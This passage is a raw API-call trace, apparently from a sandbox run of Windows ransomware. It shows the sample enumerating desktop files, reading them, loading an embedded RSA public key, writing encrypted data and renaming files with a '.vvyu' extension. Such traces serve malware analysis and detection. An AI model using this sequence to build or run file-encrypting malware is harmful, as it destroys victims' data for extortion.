lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69f8 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a58 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a70 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a10 [0199.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69e0 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf6e0 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2adf8f0 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af4180 [0199.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8f0 | out: hHeap=0x2c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69b0 | out: hHeap=0x2c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6f8 | out: hHeap=0x2c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.037] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0xbd6e, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0xbd6e, lpOverlapped=0x0) returned 1 [0199.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.038] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbd73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.039] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.040] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.040] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.040] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.041] CloseHandle (hObject=0x584) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0199.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.043] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\59BurO.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\59buro.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\59BurO.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\59buro.bmp.vvyu")) returned 1 [0199.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.045] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.048] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c2d1d50, ftCreationTime.dwHighDateTime=0x1d89b9e, ftLastAccessTime.dwLowDateTime=0xf5670860, ftLastAccessTime.dwHighDateTime=0x1d89e67, ftLastWriteTime.dwLowDateTime=0xf5670860, ftLastWriteTime.dwHighDateTime=0x1d89e67, nFileSizeHigh=0x0, nFileSizeLow=0x9658, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdIa hVz87JStJ8m.flv", cAlternateFileName="ADIAHV~1.FLV")) returned 1 [0199.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.048] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\AdIa hVz87JStJ8m.flv") returned=".flv" [0199.048] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\AdIa hVz87JStJ8m.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\adia hvz87jstj8m.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.050] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=38488) returned 1 [0199.050] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.054] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9632, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.054] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.056] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.056] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9658, lpOverlapped=0x0) returned 1 [0199.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.057] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.057] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.058] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.058] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.058] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.058] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.058] GetLastError () returned 0x0 [0199.059] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.059] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.059] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.059] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.059] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9660) returned 0x2af7168 [0199.060] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade6f8 [0199.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69b0 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade740 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.061] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a10 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae69f8 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.063] HeapFree (in: 